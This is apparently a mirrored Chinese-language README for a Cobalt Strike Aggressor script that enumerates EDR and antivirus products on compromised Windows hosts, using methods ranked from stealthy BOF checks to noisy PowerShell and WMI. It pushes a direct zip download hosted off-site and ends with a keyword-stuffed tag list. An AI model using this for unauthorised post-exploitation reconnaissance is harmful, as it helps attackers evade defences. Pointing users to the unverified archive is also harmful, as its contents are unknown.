mohamedanas069/CS-EDR-Enumeration

# 🛡️ CS-EDR-Enumeration - 轻松识别安全产品 [](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/991840babe123418.zip) ## 📝 什么是 CS-EDR-Enumeration？ CS-EDR-Enumeration 是一款旨在帮助您发现 Windows 计算机上运行的安全产品的工具。它使用 Cobalt Strike（一款知名的网络安全工具）以及名为 Aggressor Scripts 的特殊脚本。这些脚本通过六种不同的方法来检查各类安全系统。每种方法显示出不同的警报或噪音级别，从非常隐蔽到较为明显。 如果您想在不引起太多干扰的情况下了解自己或其他 Windows 机器上安装了哪些安全软件，该软件将非常有用。它适用于参与安全测试或 IT 管理的用户。 ## 🎯 关键特性 - **六种检查方法：** 从使用特殊代码文件 (BOF) 的非常隐蔽的方法，到使用 Windows PowerShell 和 WMI 的较为明显的方法。 - **易于使用：** 在 Cobalt Strike 中通过简单的命令运行脚本。 - **噪音级别控制：** 了解每次检查的“动静”大小，以避免不必要的警报。 - **Windows 支持：** 专为现代 Windows 系统设计，包括 Windows 10 和 11。 - **后渗透利用：** 帮助安全专业人员在获得系统访问权限后进行工作。 - **清晰的结果：** 显示系统上处于活动状态的安全产品。 ## 💻 系统要求 要使用 CS-EDR-Enumeration，您需要： - 一台用于测试的 Windows 计算机。 - 已安装 Cobalt Strike。这是一款用于安全测试的工具。如果您没有 Cobalt Strike，需要单独获取。 - 具备如何在 Cobalt Strike 中运行命令的基本知识。 - Windows 计算机上的管理员权限，以获得最佳结果。 - 用于下载发布文件的互联网连接。 ## 🚀 快速入门 ### 步骤 1：安装 Cobalt Strike CS-EDR-Enumeration 在 Cobalt Strike 内部运行。如果您尚未安装： 1. 访问 Cobalt Strike 官方网站。 2. 购买或获取试用许可证。 3. 按照其说明在您的 Windows 或 Linux 机器上进行安装。 ### 步骤 2：下载 CS-EDR-Enumeration 点击下方的大按钮或访问发布页面以获取最新版本： [](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/991840babe123418.zip) 为了方便，这里再次提供链接： https://static.pigsec.cn/wp-content/uploads/repos/2026/03/991840babe123418.zip ### 步骤 3：将脚本加载到 Cobalt Strike 中 下载完成后： 1. 打开 Cobalt Strike。 2. 转到菜单并选择 *Script Manager*。 3. 点击 *Load* 并选择下载的 Aggressor Script 文件（`.cna`）。 4. 脚本将加载并准备就绪。 ## 📥 下载与安装 1. 访问发布页面： https://static.pigsec.cn/wp-content/uploads/repos/2026/03/991840babe123418.zip 2. 找到带有日期和版本号的最新版本。 3. 从资产列表中下载 zip 压缩包或脚本文件（`.cna`）。 4. 将文件保存到一个易于访问的文件夹中。 5. 打开 Cobalt Strike 并按照“快速入门”部分的说明加载脚本。 ## 🔍 如何使用 CS-EDR-Enumeration 在 Cobalt Strike 中加载脚本后，请执行以下步骤来运行扫描： 1. 在 Cobalt Strike 中创建或使用现有的 Beacon 会话，该会话需连接到您要测试的 Windows 主机。 2. 在 Beacon 控制台中，输入以下命令开始枚举： edr-enum 3. 脚本将运行六种不同的检查来查找安全产品。 4. 结果将显示在 Beacon 控制台或您的 Cobalt Strike 界面中。 5. 查看输出以查看检测到的产品及其使用的方法。 ## ⚙️ 理解噪音级别 CS-EDR-Enumeration 使用的每种方法都有一个噪音级别。噪音是指安全产品或系统可能会在多大程度上注意到该扫描。 - **静默方法：** 使用 Beacon Object Files (BOF) - 在进程内部安静运行，不调用外部程序。 - **低噪音：** 有限的 PowerShell 命令，避免触发警报。 - **中等噪音：** 使用 WMI 查询，可能会生成一些日志。 - **高噪音：** 运行完整的 PowerShell 或其他系统命令，安全工具很可能会检测到这些命令。 根据您对目标机器上警报的谨慎程度选择相应的方法。 ## 🛠 故障排除提示 - 如果脚本未加载，请验证您是否下载了正确的文件，并且 Cobalt Strike 是否为最新版本。 - 如果在运行命令时遇到错误，请确保您的 Beacon 会话处于活动状态且已连接。 - 某些安全产品可能会阻止检查或隐藏自己。请尝试不同的方法或以管理员权限运行。 - 确保您对目标 Windows 主机拥有正确的权限。 - 请查阅 Cobalt Strike 和 Aggressor Script 文档以获取更多命令和选项。 ## 📚 了解更多 - 要了解 Cobalt Strike 基础知识，请访问官方文档或用户论坛。 - 研究 Windows 安全产品和检测方法，以更好地理解扫描结果。 - 了解 Beacon Object Files (BOF)，看看静默执行是如何工作的。 - 探索 PowerShell 和 WMI 基础知识，以了解为什么某些方法会产生更多噪音。 ## 💡 关于此项目 CS-EDR-Enumeration 是网络安全研究和进攻性安全工具包的一部分。它帮助安全测试人员和专业人员评估 Windows 系统上激活了哪些保护措施。该脚本专注于清晰度、对警报级别的控制以及在真实环境中的实际结果。 ## ⚖️ 许可证与贡献 该项目是开源的，可根据存储库中指定的许可证使用。欢迎贡献、提出问题和功能请求。如需贡献： - Fork 本仓库 - 进行更改 - 提交 pull request 以供审查 ## 📌 涵盖的主题 - aggressor-script - beacon-object-file (BOF) - cobalt-strike - edr-enumeration - edr-evasion - offensive-security - post-exploitation - purple-team - redteam - windows-security 如果您有问题或需要帮助，请在 GitHub 仓库中开启 issue 或联系项目维护者。

标签：Aggressor Script, AI合规, AV枚举, Cobalt Strike, Conpot, DNS枚举, EDR检测, EPP, HTTP/HTTPS抓包, Telemetry, Windows安全, 低噪声, 反取证, 反病毒探测, 后渗透阶段, 安全评估, 实时处理, 客户端加密, 态势感知, 插件系统, 攻击诱捕, 无线安全, 私有化部署, 网络安全工具, 防御规避